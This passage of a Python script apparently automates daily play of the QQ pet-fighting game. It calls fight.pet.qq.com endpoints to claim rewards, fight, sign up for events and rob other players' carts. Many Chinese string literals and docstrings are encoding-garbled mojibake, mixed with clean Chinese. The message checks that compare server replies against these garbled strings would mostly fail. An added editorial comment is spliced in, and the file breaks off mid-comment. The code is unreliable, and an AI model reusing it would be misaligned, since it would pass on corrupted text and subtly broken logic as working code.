MaxFightNpcTimes = j.get("MaxFightNpcTimes")
if str(highRadio).startswith("1"):
j = requestURL(tiguanzhuanpan)
msg = j.get("msg")
if not str(msg).startswith("ๆจๅทฒ็ปไฝฟ็จ่ฟ1ๆฌก"):
log.info("่ธข้ฆ-่ฝฌ็๏ผ" + msg)
for i in range(int(MaxFightNpcTimes) - int(figntNpcTimes)):
j = requestURL(tiguanshilian)
msg = j.get("msg")
log.info("่ธข้ฆ-่ฏ็ผ๏ผ" + msg)
for i in range(30):
j = requestURL(tiguantiaozhan)
msg = j.get("msg")
if str(msg).startswith("๏ผ"):
log.info("่ธข้ฆ-ๆๆ๏ผ" + msg)
else:
break
if str(isAwardTime).startswith("1"):
j = requestURL(tiguanlingjiang)
msg = j.get("msg")
if not str(msg).startswith("ๆจๅทฒ้ขๅ่ฟๅฅๅฑ"):
log.info("่ธข้ฆ-้ขๅฅ๏ผ" + msg)
j = requestURL(tiguanpaihangbanglingjiang)
msg = j.get("msg")
if not str(msg).startswith("ๆฑๆญ๏ผๆจๅทฒ็ป้ขๅ่ฟๅฅๅฑ"):
log.info("่ธข้ฆ-้ขๅฅ๏ผ" + msg)
def liangcao(log):
"""
็ฒฎ่
:param log:
:return:
"""
liangcaochaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=forage_war"
liangcaolingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=forage_war&subtype=6"
liangcaojingongchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=forage_war&subtype=3"
liangcaobaoxiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=forage_war&subtype=5"
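# The chest below appears to be claimable from Tuesday 06:00 through Wednesday
# 06:00, assuming the module-level globals dayOfWeek/hour (set earlier in this
# script) count Monday as 1.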
if (dayOfWeek == 2 and hour >= 6) or (dayOfWeek == 3 and hour < 6):
j = requestURL(liangcaobaoxiang)
msg = j.get("msg")
if not str(msg).startswith("ไฝ ๅทฒ้ขๅ่ฟ่ฏฅๅฅๅฑ"):
log.info("็ฒฎ่-้ขๅฅ๏ผ" + msg)
else:
j = requestURL(liangcaochaxun)
gift = j.get("gift")
if str(gift).startswith("1"):
j = requestURL(liangcaolingjiang)
msg = j.get("msg")
log.info("็ฒฎ่-้ขๅฅ๏ผ" + msg)
def kuangdong(log):
"""
็ฟๆด
:param log:
:return:
"""
kuangdongchakan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionmine"
kuangdongzhandou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionmine&op=fight"
kuangdonglingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionmine&op=reward"
j = requestURL(kuangdongchakan)
reward_rank = j.get("reward_rank")
fight_times = j.get("fight_times")
current_dungeon_pos = j.get("current_dungeon_pos")
if int(reward_rank) > 0:  # claim the mine reward
reward_message = j.get("reward_message")
mines = j.get("mines")
j = requestURL(kuangdonglingjiang)
msg = j.get("msg")
log.info("็ฟๆด-้ขๅฅ๏ผ" + reward_message + "่ทๅพ็ฟ็ณ" + mines + "ใ" + msg)
if 1 <= int(current_dungeon_pos) <= 15 and int(fight_times) < 3:
for i in range(3 - int(fight_times)):
j = requestURL(kuangdongzhandou)
msg = j.get("msg")
log.info("็ฟๆด-ๆๆ๏ผ" + msg)
def xieshenmibao(log):
"""
้ช็ฅ็งๅฎ
:param log:
:return:
"""
xieshenmibaochaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tenlottery"
xieshengaoji = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tenlottery&type=0&op=2"
xieshenjipin = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tenlottery&type=1&op=2"
j = requestURL(xieshenmibaochaxun)
advanced = j.get("advanced")
extreme = j.get("extreme")
if str(advanced.get("ifFree")).startswith("1"):  # ifFree: 0 - no free draw, 1 - free draw available
j = requestURL(xieshengaoji)
msg = j.get("msg")
log.info("้ช็ฅ็งๅฎ-็ดซ่ฒ็งๅฎ๏ผ" + msg)
if str(extreme.get("ifFree")).startswith("1"):  # ifFree: 0 - no free draw, 1 - free draw available
j = requestURL(xieshenjipin)
msg = j.get("msg")
log.info("้ช็ฅ็งๅฎ-ๆฉ่ฒ็งๅฎ๏ผ" + msg)
def dianfeng(log):
"""
ๅท
ๅณฐไนๆ
:param log:
:return:
"""
dianfengchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=gvg&sub=0"
dianfengsuijibaoming = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=gvg&sub=1&group=0"
dianfenglingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=gvg&sub=4"
j = requestURL(dianfengchaxun)
userinfo = j.get("userinfo")
if ((dayOfWeek == 1 and hour >= 6) or (dayOfWeek == 2 and hour < 24)) and str(userinfo["group"]).startswith("0"):
# random sign-up runs from Monday 06:00 to Tuesday 24:00
j = requestURL(dianfengsuijibaoming)
msg = j.get("msg")
log.info("ๅท
ๅณฐไนๆ-ๆฅๅ๏ผ" + msg)
# claim reward
j = requestURL(dianfenglingjiang)
msg = j.get("msg")
if str(msg).startswith("ๆจๅทฒ็ป้ขๅ่ฟไบ"):
pass
else:
log.info("ๅท
ๅณฐไนๆ-้ขๅฅ๏ผ" + msg)
if hour >= 6 and hour < 24 and dayOfWeek >= 3 and dayOfWeek <= 7:
j = requestURL(dianfengchaxun)
userinfo = j.get("userinfo")
chall_status = userinfo.get("chall_status")
if str(chall_status).startswith("2"):
pass
else:
try:
dianfeng = threading.Thread(target=dianfengrun, args=(log,))
dianfeng.start()
except:
log.error("Error: 无法启动线程")
def gongfeng(log, id=3089):
"""
ไพๅฅ
:param log:
:param id: ่ฆไพๅฅ็ฉๅ็id 3089่ฟ้ญไธน
:return:
"""
gongfeng = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=feeddemo&id=%(id)s"
wupinchaxun = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&sid=&channel=0&g_ut=1&cmd=owngoods&id=%(id)s"
j = requestURL(gongfeng % {"id": str(id)})
msg = j.get("msg")
if str(msg).startswith("ๆฏๅคฉๆๅคไพๅฅ5ๆฌก"):
log.info("ไพๅฅๅฎๆค็ฅ๏ผ" + msg)
else:
# todo: parse the mobile page properly
response = req.get(wupinchaxun % {"id": str(id)})
html = response.content.decode("utf-8")
pattern = re.compile('名称：[\u4e00-\u9fa5]+')
name = pattern.search(str(html)).group()
name = str(name).replace("名称：", "")
log.info("ไพๅฅๅฎๆค็ฅ๏ผไพๅฅ1ไธช" + str(name) + "ใ" + msg)
def fenxiang(log):
"""
ไธ้ฎๅไบซ
:param log:
:return:
"""
fenxiangsuoyou = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&sid=&channel=0&g_ut=1&cmd=sharegame&subtype=6"
response = req.get(fenxiangsuoyou)  # mobile-side call; the response is not parsed
log.info("ๅไบซ๏ผไธ้ฎๅไบซๅฎๆ")
def wulin(log, baomingtype=1):
"""
ๆญฆๆๆฅๅ
:param log:
:param baomingtype: ๆฅๅ็็ฑปๅ 0-ๆๆบๆญฆๆ 1-็ต่ๆญฆๆ
:return:
"""
wulinchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=showwulin"
diannaowulin = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=signup&id=%(id)s0306"
shoujiwulin = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&sid=&channel=0&g_ut=1&cmd=fastSignWulin"
# 1. Get the current tournament number
j = requestURL(wulinchaxun)
period = j.get("period")
if str(baomingtype).startswith("1"):
# 2.1 Sign up for the PC bracket
# print(str(period) + "0306")
# j = requestURL(diannaowulin %{"id" : str(period) + "0306"})
j = requestURL(diannaowulin % {"id": str(period)})
msg = j.get("msg")
log.info("ๆญฆๆๅคงไผ็ต่(็ฌฌ" + str(period) + "ๅฑ)๏ผ" + msg)
elif str(baomingtype) == "0":
# 2.2 Sign up for the mobile bracket
response = req.get(shoujiwulin)
j = requestURL(wulinchaxun)  # query again to confirm the sign-up result
msg = j.get("msg")
log.info("ๆญฆๆๅคงไผๆๆบ(็ฌฌ" + str(period) + "ๅฑ)๏ผ" + msg)
else:
pass
def xialv(log):
"""
ไพ ไพฃๆฅๅ
:param log:
:return:
"""
xialv = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=couplefight&subtype=4"
j = requestURL(xialv)
msg = j.get("msg")
log.info("ไพ ไพฃไบ้ธ่ต๏ผ" + msg)
def menpai(username, log):
"""
้จๆดพ
:param username:
:param log:
:return:
"""
menpailiutang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=%(op)s"
menpaishangxiangputong = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&type=free&op=fumigate"
menpaishangxianggaoxiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&type=paid&op=fumigate"
menpaimuzhuang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&op=trainwithnpc"
menpaitongmen = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&op=trainwithmember"
menpaiduihuanzhanshu = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=exchange&type=1249&subtype=2&times=%(times)s"  # exchange battle letters (zhanshu)
menpaiqiecuozhangmen = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&op=trainingwithcouncil&rank=1&pos=1"
menpaiqiecuoshouzuo = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&op=trainingwithcouncil&rank=2&pos=%(pos)s"
menpaiqiecuotangzhu = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&op=trainingwithcouncil&rank=3&pos=%(pos)s"
menpairenwulingjinag = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect_task&subtype=2&task_id=%(task_id)s"
shuxingchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=viewattr&puin=%(puin)s"
chakanhaoyou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=view&kind=1&sub=1&selfuin=%(selfuin)s"
ledou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fight&puin=%(puin)s"  # fight a friend
menpaiputongxinfasuiji = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect_art&subtype=2&art_id=%(art_id)s&times=1"
menpaiyaoqingsaixinxi = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=secttournament"
menpaiyaoqingsaibaoming = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=secttournament&op=signup"
menpaiyaoqingsaizhandou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=secttournament&op=fight"
menpaiyaoqingsaipaihangbang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=secttournament&op=showlastseasonrank"
menpaiyaoqingsailingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=secttournament&op=getrankandrankingreward"
# 1. Open the six sect sub-pages
for item in ["sect_art", "sect_trump", "sect&op=showcouncil", "sect_task", "sect&op=showtraining",
"sect&op=showincense"]:
requestURL(menpailiutang % {"op": str(item)})
# 2. Offer incense
j = requestURL(menpaishangxiangputong)
msg = j.get("msg")
if not str(msg).startswith("每日免费上香次数已达上限"):
log.info("้จๆดพ-ไธ้ฆ๏ผ" + msg)
# todo: better flow - check the high-incense count first, then offer
j = requestURL(menpaishangxianggaoxiang)
msg = j.get("msg")
if str(msg).startswith("้จๆดพ้ซ้ฆๆฐ้ไธ่ถณ"):
j = requestURL(menpaishangxianggaoxiang)
msg = j.get("msg")
log.info("้จๆดพ-ๅ
ๆข๏ผ" + msg)
if not str(msg).startswith("ๆฏๆฅไธ้ซ้ฆๆฌกๆฐๅทฒ่พพไธ้"):
log.info("้จๆดพ-ไธ้ฆ๏ผ" + msg)
# 3. Training
j = requestURL(menpailiutang % {"op": "sect&op=showtraining"})
npc_challenged_times = j.get("npc_challenged_times")
member_challenged_times = j.get("member_challenged_times")
if not str(npc_challenged_times).startswith("1"):
j = requestURL(menpaimuzhuang)  # one wooden-dummy training round
msg = j.get("msg")
log.info("้จๆดพ-ๆจๆกฉ่ฎญ็ป๏ผ" + msg)
if not str(member_challenged_times).startswith("2"):
remaining = 2 - int(member_challenged_times)
while remaining > 0:  # two fellow-disciple spars per day
j = requestURL(menpaitongmen)
msg = j.get("msg")
if str(msg).startswith("门派战书数量不足"):
# out of battle letters: exchange one, then retry this round
j = requestURL(menpaiduihuanzhanshu % {"times": "1"})
msg = j.get("msg")
log.info("门派-兑换：" + msg)
else:
log.info("门派-同门切磋：" + msg)
remaining -= 1
# 4. Sect sparring (qiecuo)
j = requestURL(menpaiqiecuozhangmen)  # spar with the sect leader
msg = j.get("msg")
log.info("门派-切磋：" + msg)
for i in range(2):
j = requestURL(menpaiqiecuoshouzuo % {"pos": str(i + 1)})  # spar with elders 1-2
msg = j.get("msg")
log.info("门派-切磋：" + msg)
for i in range(4):
j = requestURL(menpaiqiecuotangzhu % {"pos": str(i + 1)})  # spar with hall masters 1-4
msg = j.get("msg")
log.info("门派-切磋：" + msg)
# 5. Sect tasks
j = requestURL(menpailiutang % {"op": "sect_task"})
task = j.get("task")
for i in range(3):
id = task[i].get("id")
state = task[i].get("state")
if str(state) == "2":
continue
elif str(state) == "1":
j = requestURL(menpairenwulingjinag % {"task_id": str(id)})
msg = j.get("msg")
log.info("้จๆดพ-ไปปๅก้ขๅฅ๏ผ" + msg)
elif str(state) == "0":
if str(id) == "101": # todo ๆไธๆฌกๅ
ถไป้จๆดพๆๅ
j = requestURL(menpailiutang % {"op": "sect"})
selfsect = j.get("sect") # ๆฌไบบ้จๆดพ
j = requestURL(shuxingchaxun % {"puin": str(username)})
level = j.get("level")
j = requestURL(chakanhaoyou % {"selfuin": str(username)})
list = []
info = j.get("info")
for i in info:
# pick friends outside our sect, within 10 levels, who haven't been fought today
if not str(i.get("sect")).startswith("0") and not str(i.get("sect")).startswith(
selfsect) and not str(i.get("enable")).startswith("0"):
if int(level) - 10 <= int(i.get("lilian")) <= int(level) + 10:
list.append(i)
if len(list) == 0:
for i in info:
# fall back: only require a different sect and not yet fought today
if not str(i.get("sect")).startswith("0") and not str(i.get("sect")).startswith(
selfsect) and not str(i.get("enable")).startswith("0"):
list.append(i)
# print((list))
for i in list:
j = requestURL(ledou % {"puin": str(i.get("uin"))})
if j != None:
log.info("้จๆดพ-ไปปๅก๏ผๆๆๅฅฝๅ " + i.get("name") + "(" + i.get("uin") + ")")
break
elif str(id) == "104": # ไฟฎ็ผ1ๆฌกๅฟๆณ
for i in range(10): # ้ๆบไฟฎ็ผๅฟๆณ๏ผๅฐ่ฏ10ๆฌกไธๆๅๅฐฑ้ๅบ
j = requestURL(menpaiputongxinfasuiji % {"art_id": str(random.randint(101, 118))})
msg = j.get("msg")
if str(msg).startswith("ไฟฎ็ผๆๅ"):
log.info("้จๆดพ-ๆฎ้ๅฟๆณ๏ผ" + msg)
break
j = requestURL(menpairenwulingjinag % {"task_id": str(id)})
msg = j.get("msg")
log.info("้จๆดพ-ไปปๅก้ขๅฅ๏ผ" + msg)
elif str(id) == "109" or str(id) == "110": # 109ๆฅ็ไธๆฌกๅ้จ่ตๆ๏ผ110ๆฅ็ไธๆฌกๅ
ถไป้จๆดพๆๅ็่ตๆ
# visit all six sect pages in one pass: https://fight.pet.qq.com/cgi-bin/petpk?cmd=visit&puin=
for uin in ["51215628", "1213197377", "526210932", "1532252524", "2648480160",
"294474047"]: # ไธๅธฎ ๅๅฑฑ ๅณจ็ ๅฐๆ ๆญฆๅฝ ๆๆ
requestURL("https://fight.pet.qq.com/cgi-bin/petpk?cmd=visit&puin=" + str(uin))
j = requestURL(menpairenwulingjinag % {"task_id": str(id)})
msg = j.get("msg")
log.info("้จๆดพ-ไปปๅก้ขๅฅ๏ผ" + msg)
else:
pass
else:
pass
# 6. Sect invitational
# 6.1 Claim last season's reward
j = requestURL(menpaiyaoqingsaipaihangbang)
has_reward = j.get("has_reward")
if str(has_reward).startswith("1"):
j = requestURL(menpaiyaoqingsailingjiang)
msg = j.get("msg")
log.info("้จๆดพ้่ฏท่ต-้ขๅฅ" + msg)
# 6.2 Check our own sign-up status
j = requestURL(menpaiyaoqingsaixinxi)
in_group = j.get("in_group")
left_fight_times = j.get("left_fight_times")
if str(in_group) == "0":  # 0 - not signed up, 1 - signed up
j = requestURL(menpaiyaoqingsaibaoming)
msg = j.get("msg")
log.info("้จๆดพ้่ฏท่ต-ๆฅๅ๏ผ" + msg)
# 6.3 Fights
if (dayOfWeek == 3 and hour >= 6) or (dayOfWeek == 1 and hour < 6) or (4 <= dayOfWeek <= 7):
if int(left_fight_times) > 0:
remaining = int(left_fight_times)
while remaining > 0:
j = requestURL(menpaiyaoqingsaizhandou)
msg = j.get("msg")
if str(msg).startswith("门派战书数量不足"):
# out of battle letters: exchange one, then retry this fight
j = requestURL(menpaiduihuanzhanshu % {"times": "1"})
msg = j.get("msg")
log.info("门派-兑换：" + msg)
else:
log.info("门派邀请赛-挑战：" + msg)
remaining -= 1
# Wending (问鼎天下)
def wending(level, isabandon, log):
"""
้ฎ้ผ todo 1.ๆๅฎๆฌกๆฐ
:param level: ่ตๆบ็น็ญ็บง 1-1็บงๅฐ็ 2-2็บง 3-3็บง
:param isabandon: ๅ ้ข่ตๆบ็นๆฏๅฆๆพๅผ 0-ไธๆพๅผ 1-ๆพๅผ
:param log:
:return:
"""
wendingzhuwei1 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tbattle&op=cheerregionbattle&faction=10215"
wendingzhuwei2 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tbattle&op=cheerchampionbattle&faction=10215"
wendinglingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tbattle&op=drawreward"
wendingfangqi = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tbattle&op=abandon"
wendingziyuan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tbattle&op=drawreleasereward"
wendinggongji = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tbattle&op=occupy&id=%(id)s"
# Cheer - regional elimination round
if dayOfWeek == 6 and (6 < hour < 19 or (hour == 19 and minute < 30)):
j = requestURL(wendingzhuwei1)
msg = j.get("msg")
log.info("้ฎ้ผๅคฉไธ-ๅบๅๆทๆฑฐ่ตๅฉๅจ๏ผ" + msg)
# Cheer - championship round
if (dayOfWeek == 6 and hour >= 21) or (dayOfWeek == 7 and (hour < 19 or (hour == 19 and minute < 30))):
j = requestURL(wendingzhuwei2)
msg = j.get("msg")
log.info("้ฎ้ผๅคฉไธ-ๅ ๅๆๅ่ตๅฉๅจ๏ผ" + msg)
# Claim reward
j = requestURL(wendinglingjiang)
msg = j.get("msg")
if not str(msg).startswith("ๆฑๆญ๏ผไธๅฑ้ฎ้ผๅคฉไธๆจๆ ๅฅๅฑๅฏ้ขๅ") and not str(msg).startswith("ไฝ ๅทฒ็ป้ขๅ่ฟไธๅฑ้ฎ้ผๅคฉไธๅฅๅฑไบ"):
log.info("้ฎ้ผๅคฉไธ-้ขๅฅ๏ผ" + msg)
if (dayOfWeek == 1 and hour >= 6) or (dayOfWeek == 6 and hour < 6) or (2 <= dayOfWeek <= 5):
# abandon the current resource point
j = requestURL(wendingfangqi)
msg = j.get("msg")
log.info("้ฎ้ผๅคฉไธ-ๆพๅผ่ตๆบ็น๏ผ" + msg)
# collect resources
j = requestURL(wendingziyuan)
msg = j.get("msg")
log.info("้ฎ้ผๅคฉไธ-ๆถๅ่ตๆบ๏ผ" + msg)
# attack one plot of level {level} (generateID is defined elsewhere in this script)
j = requestURL(wendinggongji % {"id": generateID(int(level))})
msg = j.get("msg")
log.info("้ฎ้ผๅคฉไธ-ๅ ้ข่ตๆบ็น๏ผ" + msg)
if isabandon == 1:
j = requestURL(wendingfangqi)
msg = j.get("msg")
log.info("้ฎ้ผๅคฉไธ-ๆพๅผ่ตๆบ็น๏ผ" + msg)
else:
pass
def doushentarun(log, time):
"""
ๆ็ฅๅกๆๆ็บฟ็จ
:param log:
:param time:
:return:
"""
doushentatiaozhan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=towerfight&type=0"
fenxiangdoushenta = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=shareinfo&subtype=1&shareinfo=4"
doushentazidong = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=towerfight&type=1"
basetime = time
if time == 8:
basetime = 10
log.info("ๆ็ฅๅก๏ผๅผๅงๆๆ๏ผๅนถๆฏ10ๅฑๅไบซไธๆฌก")
for i in range(1, 101):
requestURL(doushentatiaozhan)  # fight one floor
sleep(basetime + 1)  # wait out the fight cooldown
if i >= 10 and i % 10 == 2:  # share once every 10 floors
j = requestURL(fenxiangdoushenta)
msg = j.get("msg")
if str(msg).startswith("ๅไบซๆๅ"):
log.info("ๅไบซ๏ผ" + msg)
elif str(msg).startswith("ๆจไปๆฅ็ๅไบซๆฌกๆฐๅทฒ่พพไธ้"):
requestURL(doushentazidong)  # switch to auto-fight
log.info("ๅไบซ๏ผ" + msg)
break
def dianfengrun(log):
"""
ๅท
ๅณฐไนๆๆๆ็บฟ็จ
:param log:
:return:
"""
dianfengchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=gvg&sub=0"
dianfengzhandou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=gvg&sub=3"
for i in range(10):
j = requestURL(dianfengchaxun)
result = j.get("result")
if str(result).startswith("-2"):  # server busy; stop this run
break
userinfo = j.get("userinfo")
cd_time = userinfo.get("cd_time")
if int(cd_time) == 0 or int(cd_time) >= 300:
pass
else:
sleep(int(cd_time) + 1)
j = requestURL(dianfengzhandou)
msg = j.get("msg")
if str(msg).startswith("ๆญๅไฝ ") or str(msg).startswith("ๅพ้ๆพ"):
log.info("ๅท
ๅณฐไนๆ-ๆๆ๏ผ" + msg)
elif str(msg).startswith("请您先报名") or str(msg).startswith("您今天挑战次数已经达到上限") or str(msg).startswith(
"您今天已经用完复活次数了"):
log.info("巅峰之战-挑战：" + msg)
break
elif str(msg).startswith("冷却时间"):
continue
else:
pass
def jiebiaorun(username, jiebiaolevel, log):
"""
ๅซ้็บฟ็จ todo ไผๅ้ป่พ
:param username:
:param jiebiaolevel:
:param log:
:return:
"""
biaoxingtianxiajiebiaoliebiao = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=3"
biaoxingtianxiajiebiao = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=14&passerby_uin=%(passerby_uin)s"
j = requestURL("https://fight.pet.qq.com/cgi-bin/petpk?cmd=rank&kind=5&other=" + str(username))
gerenzhanli = float(j.get("total"))
newlist = []
count = 0
while True:
j = requestURL(biaoxingtianxiajiebiaoliebiao)
result = j.get("result")
if str(result).startswith("-1") or str(result).startswith("-2"):  # server busy, retry (fixme: probably no longer needed)
sleep(1)
continue
else:
passerbys = j.get("passerbys")  # fetch the robbable-cart list
if passerbys is None:
continue
for item in passerbys:
if int(item.get("aow_award")) >= int(jiebiaolevel): # ็ญ้
# power check: only rob owners at most 300 power above ourselves
j = requestURL(
"https://fight.pet.qq.com/cgi-bin/petpk?cmd=rank&kind=5&other=" + str(item.get("passerby_uin")))
zhanli = float(j.get("total"))
if (zhanli - gerenzhanli) <= 300:
newlist.append(item)
looted_count = 3
if len(newlist) == 0:  # nothing matched the filter; fetch the list again
continue
else:  # start robbing
for car in newlist:
j = requestURL(biaoxingtianxiajiebiao % {"passerby_uin": str(car.get("passerby_uin"))})
msg = j.get("msg")
if str(msg).startswith("这个镖车在保护期内"):
continue
drop = j.get("drop")
# print("้่กๅคฉไธ-ๅซ้๏ผ" + response.content.decode("gbk")) # fixme
log.info("้่กๅคฉไธ-ๅซ้๏ผ" + drop)
looted_count = j.get("looted_count")
newlist.clear()
if int(looted_count) == 3:
break
newlist.clear()
if int(looted_count) == 3:
break
def doushenta(log):
"""
ๆ็ฅๅก
:param log:
:return:
"""
doushentajieshu = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=towerfight&type=7&confirm=1"
doushentachaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=towerfight&type=3"
daren = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=ledouvip"
# 1. End any tower run in progress
j = requestURL(doushentajieshu)
msg = j.get("msg")
if not str(msg).startswith("้ๆณๆไฝ"):
log.info("ๆ็ฅๅก็ปๆๆๆ๏ผ" + msg)
# 2. Fetch today's remaining attempts
j = requestURL(doushentachaxun)
day_left_times = j.get("day_left_times")  # free attempts left today
j = requestURL(daren)
lvl = j.get("lvl")
if str(day_left_times).startswith("1"):
try:
doushenta = threading.Thread(target=doushentarun, args=(log, max(8 - int(lvl), 1)))
doushenta.start()
except:
log.error("Error: 无法启动线程")
else:
log.info("ๆ็ฅๅก๏ผไปๆฅๅฉไฝๅ
่ดนๆฌกๆฐ" + day_left_times)
def biaoxingtianxia(username, log, yabiaolevel=2, jiebiaolevel=2):
"""
้่กๅคฉไธ
:param username:
:param log:
:param yabiaolevel:
:param jiebiaolevel:
:return:
"""
biaoxingtianxiayabiaojieguo = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=15"
biaoxingtianxialingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=16"
biaoxingtianxiaqicheng = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=6"
biaoxingtianxiayabiaoxinxi = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=7"
biaoxingtianxiayabiaoshuaxin = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=8"
biaoxingtianxiaxinxi = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=0"
# 1. First check whether an escort reward is waiting
j = requestURL(biaoxingtianxiayabiaojieguo)
escort_state = j.get("escort_state")  # 0 - nothing pending, 1 - reward waiting
if str(escort_state).startswith("1"):
j = requestURL(biaoxingtianxialingjiang)
msg = j.get("msg")
log.info("้่กๅคฉไธ-้ขๅฅ๏ผ" + msg)
# 2. Escort; yabiaolevel picks the minimum cart tier (0, 1 or 2)
j = requestURL(biaoxingtianxiaxinxi)
convey_count = j.get("convey_count")
if str(convey_count).startswith("1"):  # already escorted today
pass
else:
# 2.1 Fetch the current cart info
j = requestURL(biaoxingtianxiayabiaoxinxi)
reselect_times = j.get("reselect_times")
car_lvl = j.get("car_lvl")
if str(reselect_times).startswith("0") or int(car_lvl) >= int(yabiaolevel):  # no rerolls left, or the cart is already good enough
pass
else:
for i in range(int(reselect_times)):
j = requestURL(biaoxingtianxiayabiaoshuaxin)  # reroll the cart
msg = j.get("msg")
car_lvl = j.get("car_lvl")
log.info("้่กๅคฉไธ-ๆผ้๏ผ" + msg)
if int(car_lvl) >= int(yabiaolevel):  # got a good enough cart
break
j = requestURL(biaoxingtianxiaqicheng)
msg = j.get("msg")
log.info("้่กๅคฉไธ-ๆผ้๏ผ" + msg)
# 3. Robbing (jiebiao) runs in its own thread
j = requestURL(biaoxingtianxiaxinxi)
looted_count = j.get("looted_count")
if not str(looted_count).startswith("3"):
try:
jiebiao = threading.Thread(target=jiebiaorun, args=(username, jiebiaolevel, log))
jiebiao.start()
except:
log.error("Error: 无法启动线程")
# (requires an explicit item id)
def shiyongwupin(QQnum, id, log):
"""
ไฝฟ็จ่ๅ
็ฉๅ
:param QQnum: ๅฝๅ็ปๅฝqqๅท
:param id: ่ฆไฝฟ็จ็ฉๅ็id
:param log:
:return:
"""
beibaowupinshiyongdiannao = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=use&selfuin=%(selfuin)s&id=%(id)s"
response = req.get(beibaowupinshiyongdiannao % {"selfuin": str(QQnum), "id": str(id)})
html = response.content.decode("gbk")
j = json.loads(html)
msg = j.get("joinground")
log.info(msg)
# todo: complete the daily tasks automatically
def meirirenwuzhixing(header, cookie, id, log):
if id == "13":  # use the item with id 3018 once
beibaowupinshiyongshouji = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&sid=&channel=0&g_ut=1&cmd=use&id=%(id)s"
response = req.get(beibaowupinshiyongshouji % {"id": str(3018)})
elif id == "22":  # spar with 7 friends within 20 levels
pass
elif id == "28":  # view 5 friends' profiles
gerenxinxi = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&B_UID=0&sid=&channel=0&g_ut=1&cmd=totalinfo&type=1"
for i in range(5):
j = requestURL(gerenxinxi)
elif id == "29":  # tournament sign-up (defaults to the PC bracket)
pass
elif id == "34":  # fight boss id 15
pass
elif id == "36":  # fight boss id 12
pass
elif id == "61":  # fight a sworn friend once
pass
elif id == "67":  # fight strangers 3 times
pass
elif id == "74":  # one tower (doushenta) run
pass
elif id == "78":  # three training (lilian) fights
pass
elif id == "86":  # fight boss id 16
pass
elif id == "88":  # fight boss id 14
pass
elif id == "89":  # fight boss id 19
pass
elif id == "103":  # transfer power 6 times
pass
elif id == "104":  # share 3 times
pass
elif id == "107":  # dungeon (huanjing)
pass
elif id == "108":  # zodiac (shiergong)
pass
elif id == "109":  # finish one escort
pass
elif id == "111":  # rob a cart once (win or lose)
pass
elif id == "112":  # rob carts 3 times (win or lose)
pass
elif id == "114":  # one mastery enhancement (rune stone)
pass
elif id == "115":  # one mastery enhancement (second material)
pass
elif id == "11":  # enhance the badge once
pass
else:  # unknown task id
pass
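# --- Hedged design note (not part of the original script) ---
# The elif ladder above is mostly placeholders. Once the handlers exist, a
# table-driven dispatch keeps it flat; the table below is a hypothetical sketch
# that reuses functions defined in this file, not an implemented API.
#
# DAILY_TASK_HANDLERS = {
#     "74": doushenta,                      # one tower run
#     "78": lambda log: lilian(2, 3, log),  # three training fights
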